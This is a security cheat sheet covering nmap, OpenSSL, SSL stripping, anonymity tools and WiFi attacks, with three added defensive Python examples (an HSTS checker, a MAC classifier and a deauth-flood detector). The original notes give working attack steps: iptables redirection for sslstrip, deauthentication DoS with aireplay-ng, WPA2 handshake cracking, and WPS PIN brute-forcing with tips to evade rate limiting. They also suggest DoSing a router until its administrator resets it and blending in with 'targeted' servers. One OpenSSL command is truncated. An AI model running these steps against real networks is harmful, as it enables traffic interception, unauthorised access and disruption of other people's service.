Security
- 1: nmap
- 2: OpenSSL
- 3: SSL Stripping
- 4: Staying Anonymous
- 5: WiFi
1 - nmap
nmap is a powerful tool for mapping networks (website).
Examples
- nmap -p 22 -sV 10.20.21.0/24 - scan IPs 10.20.21.0 - 10.20.21.255 on port 22
2 - OpenSSL
OpenSSL is a powerful CLI for working with certificates.
| Description | Command |
|---|---|
| Read cert | `openssl x509 -in cert.pem -text` |
| Create domain key | `openssl genrsa -out <your-domain>.key <2048 or 4096>` |
| Create a CSR | `openssl req -new -sha256 -key <your-domain>.key -out <your-domain>.csr` |
| Create a Self Signed Cert | `echo 01 \|` |
3 - SSL Stripping
After we connect to a network we can see all traffic on it, which is not very useful because most important traffic is encrypted.
Install sslstrip and dsniff.
- Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
- Add rule: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
- Verify rule: iptables -t nat -L PREROUTING
- Ensure redirect port is open: iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
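The browser-side defence against this downgrade is HSTS: a host that the browser has seen over HTTPS with a Strict-Transport-Security header is never requested over plain port 80 again. The following is an added example, not code from the original notes, that parses that header and rates how exposed a host remains; the header values it feeds in are constructed.

```python
"""Added example (not from the original notes): rate how well a site's
Strict-Transport-Security (HSTS) header resists the downgrade set up above.
sslstrip relies on the client being willing to speak plain HTTP on port 80;
a browser that has cached an HSTS policy for the host refuses to do that."""
import re

ONE_YEAR = 365 * 24 * 3600


def parse_hsts(value):
    """Parse an HSTS header value into a dict. Returns None when the header
    is absent or lacks the mandatory max-age directive, which browsers ignore."""
    if value is None:
        return None
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        directive = directive.strip().lower()
        m = re.fullmatch(r'max-age\s*=\s*"?(\d+)"?', directive)
        if m:
            policy["max_age"] = int(m.group(1))
        elif directive == "includesubdomains":
            policy["include_subdomains"] = True
        elif directive == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def stripping_exposure(value):
    """'none': no usable policy, every visit is downgradable.
    'weak': policy expires quickly, so protection lapses between visits.
    'first-visit': only the very first plaintext visit is exposed.
    'preload-eligible': directives meet the browser preload-list rules, so once
    the host is listed even the first visit is protected."""
    policy = parse_hsts(value)
    if policy is None or policy["max_age"] == 0:
        return "none"
    if policy["max_age"] < ONE_YEAR:
        return "weak"
    if policy["preload"] and policy["include_subdomains"]:
        return "preload-eligible"
    return "first-visit"


if __name__ == "__main__":
    # Constructed header values, not taken from any real site.
    for header in ("max-age=31536000; includeSubDomains; preload",
                   "max-age=300", "includeSubDomains", None):
        print(repr(header), "->", stripping_exposure(header))
```

Run it against the headers of a site you operate (curl -sI https://host | grep -i strict) to see which bucket it lands in.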
4 - Staying Anonymous
Proxy, VPN, Tor
Note about location: you want to access the servers you are targeting from the same region as the typical user base, to blend in.
Commands below may work on other distributions, but they assume you are on Kali Linux.
Tor
Shouldn't run as root (create a separate user: adduser newusername).
Download from https://www.torproject.org
Traffic goes through a variety of nodes; at each node another layer of encryption is added.
After making it through the inner nodes, the exit node makes the actual request.
Difficult/impossible to track unless somebody controlled all inner nodes (extremely unlikely).
Proxychains
Proxychains allows you to route traffic through a series of proxies.
- Use dynamic_chain in most cases.
- Proxies can be HTTP, SOCKS4, or SOCKS5. Always use SOCKS5.
- Add SOCKS5 127.0.0.1 9050 to the bottom of your /etc/proxychains.conf
- Start tor: service tor start
- Verify: service tor status
- Verify anonymity: proxychains firefox www.dnsleaktest.com (your IP should be in another country)
The more free proxies you use the slower things will be; select just a few free proxies with the highest uptime/reviews.
VPN
Change DNS provider from your ISP. OpenDNS is a good option.
Replace your prepend domain-name-servers ....; line with prepend domain-name-servers IP1, IP2; where IP1/2 are the OpenDNS IPs.
Restart your network-manager: service network-manager restart
Verify changes: cat /etc/resolv.conf - the output should show nameserver IP1 and nameserver IP2 as your first 2 lines.
Get & Use VPN
- Download a free VPN config from a site like VPN Book; note the user/password.
- Unzip the download.
- Make sure all browsers are closed. Navigate to the unzipped folder and run openvpn vpnprefix-tcp443.ovpn; vpnprefix will vary based on the package you chose.
- Use the credentials to log in to the VPN.
- Wait for the Initialization Sequence Complete message to come up.
- Verify: open a browser and go to DNS Leak Test, and verify your location is not your actual location. Click Standard Test and make sure your ISP is not your actual ISP.
MAC Addresses
A MAC address doesn't make it past the router.
Doesn't really matter if you change it on a VM.
macchanger is a great, easy-to-use tool.
Change MAC address every time you boot up:
- Open crontab config: crontab -e
- Add this line and save: @reboot macchanger -r eth0
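The address macchanger -r assigns is still visible to everything on the local segment (the notes are right that it does not cross the router), and its first octet tells a defender it is not a burned-in address: macchanger -r sets the locally-administered bit unless you pass -b/--bia. The following is an added example, not from the original notes, that reproduces that bit logic and triages constructed DHCP log lines with it.

```python
"""Added example (not from the original notes): what a randomised MAC such as
the one `macchanger -r` assigns at boot looks like from the network side.
Bit 1 of the first octet is the locally-administered (LA) flag: vendor-burned
addresses have it clear, randomised ones set it, so DHCP logs can be triaged."""
import re
import secrets


def random_mac(locally_administered=True):
    """Generate a unicast MAC, mimicking macchanger -r: random bytes with the
    multicast bit cleared and the LA bit set (or clear, like macchanger -b)."""
    octets = bytearray(secrets.token_bytes(6))
    octets[0] &= 0xFC           # clear multicast (bit 0) and LA (bit 1)
    if locally_administered:
        octets[0] |= 0x02
    return ":".join(f"{b:02x}" for b in octets)


def classify_mac(mac):
    """Return 'multicast', 'locally-administered' or 'vendor-assigned'."""
    first = int(mac.split(":")[0], 16)
    if first & 0x01:
        return "multicast"
    return "locally-administered" if first & 0x02 else "vendor-assigned"


# Constructed dhcpd-style log lines (not from a real server).
SAMPLE_LOG = """\
May  1 08:00:01 gw dhcpd: DHCPACK on 10.20.21.15 to 00:1a:2b:3c:4d:5e via eth0
May  1 08:00:04 gw dhcpd: DHCPACK on 10.20.21.16 to 02:9f:11:aa:bb:cc via eth0
May  1 08:00:09 gw dhcpd: DHCPACK on 10.20.21.17 to d6:45:01:02:03:04 via eth0
"""
LEASE_RE = re.compile(r"DHCPACK on (\S+) to ([0-9a-f:]{17})", re.IGNORECASE)


def flag_randomised_leases(log_text):
    """Return (ip, mac) for every lease handed to a locally-administered MAC."""
    hits = []
    for line in log_text.splitlines():
        m = LEASE_RE.search(line)
        if m and classify_mac(m.group(2)) == "locally-administered":
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    mac = random_mac()
    print(mac, classify_mac(mac))
    print(flag_randomised_leases(SAMPLE_LOG))
```

Phones that randomise their Wi-Fi MAC per network set the same bit, so treat a hit as a triage signal rather than proof of spoofing.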
5 - WiFi
These notes are intended for Whitehat/Educational purposes only
Configure Machine
Use ifconfig to determine the device name (assume wlan0 for the commands below).
- ifconfig wlan0 down - take the device down
- iwconfig wlan0 mode monitor - set monitor mode
- ifconfig wlan0 up - bring the device back up
- airmon-ng check wlan0 - make sure nothing is interfering with your device
- Kill the listed processes (kill the network manager first)
Useful Commands
Remember to change your MAC address (notes on this page).
- airodump-ng wlan0 - show wireless access points and connected devices
- airodump-ng -c CHANNEL --bssid MAC -w FILENAME DEVICE - look at traffic on a specific device
- aireplay-ng -0 0 -a MAC DEVICE - DOS attack a wireless network
To crack WPA2
Force user(s) to disconnect using a DOS attack, then watch them reconnect and capture the handshake.
- aircrack-ng -w WORDFILE CAPFILE -e ESSID - try to crack the capture file with a word list
- crunch MINLEN MAXLEN -t PATTERN | aircrack-ng -w - CAPFILE -e ESSID - try to crack with a pipe from crunch (this operation happens locally against the file, not live against the router)
To crack WPS
- Use wash -i DEVICE to view available routers to attack without WPS locked.
- Use airodump-ng to confirm you have good enough range.
- Use reaver to orchestrate your attack.
WPS uses either a 4 or 8 digit PIN consisting only of numbers; you should disable it on your router (it is usually enabled by default).
Many routers will disable PIN access for some period of time after too many failed attempts (rate limiting); you can adjust reaver to try less often to avoid tripping this failsafe.
That same failsafe makes it easy to perform DOS on networks that rely on WPS authentication. If the rate limiting locks you out completely, you can DOS it hard enough to try and force the administrator to reset their router.
DOS Attacks
Basically impossible to stop.
May need to set the channel of your wifi card: iwconfig DEVICE channel CHANNEL
Then use aireplay-ng -0 0 -a MAC DEVICE to DOS all connected machines.
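The reason the notes call this impossible to stop is that deauthentication frames are unauthenticated unless the network uses 802.11w Protected Management Frames; where PMF cannot be enabled for every client, the remaining defence is to detect the flood. The following is an added example, not from the original notes, that spots an aireplay-style burst in a constructed frame log; the (seconds, bssid, destination, reason) record format is an assumption.

```python
"""Added example (not part of the original notes): a small detector for the
deauthentication flood that `aireplay-ng -0 0` produces. Without 802.11w
(Protected Management Frames) any station can forge deauth frames, so the
practical defences are enabling PMF where clients support it and alerting
when the frame rate is far above what a normal roam or disconnect causes."""
from collections import deque, defaultdict

# Constructed frame log: (seconds, bssid, destination, reason code). The
# record layout is assumed (e.g. a monitor-mode capture exported to CSV); a
# broadcast deauth has destination ff:ff:ff:ff:ff:ff and reason 7. One normal
# disconnect, then a 64-frame burst at 50 frames/s, then another normal one.
SAMPLE_FRAMES = [(0.0, "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66", 3)] + [
    (1.0 + i * 0.02, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff", 7) for i in range(64)
] + [(5.0, "aa:bb:cc:dd:ee:02", "11:22:33:44:55:77", 3)]


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Return alerts (t, bssid, count) when more than `threshold` deauth
    frames for one BSSID arrive within `window` seconds. One alert per
    BSSID per burst, so a sustained flood does not spam the log."""
    recent = defaultdict(deque)      # bssid -> timestamps inside the window
    alerting = set()                 # BSSIDs already reported for this burst
    alerts = []
    for t, bssid, _dst, _reason in sorted(frames):
        q = recent[bssid]
        q.append(t)
        while q and t - q[0] > window:
            q.popleft()              # drop frames older than the window
        if len(q) > threshold:
            if bssid not in alerting:
                alerting.add(bssid)
                alerts.append((t, bssid, len(q)))
        elif len(q) <= 1:
            alerting.discard(bssid)  # burst is over; allow a new alert later
    return alerts


if __name__ == "__main__":
    for t, bssid, n in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"t={t:.2f}s deauth flood against {bssid}: {n} frames in 1s")
```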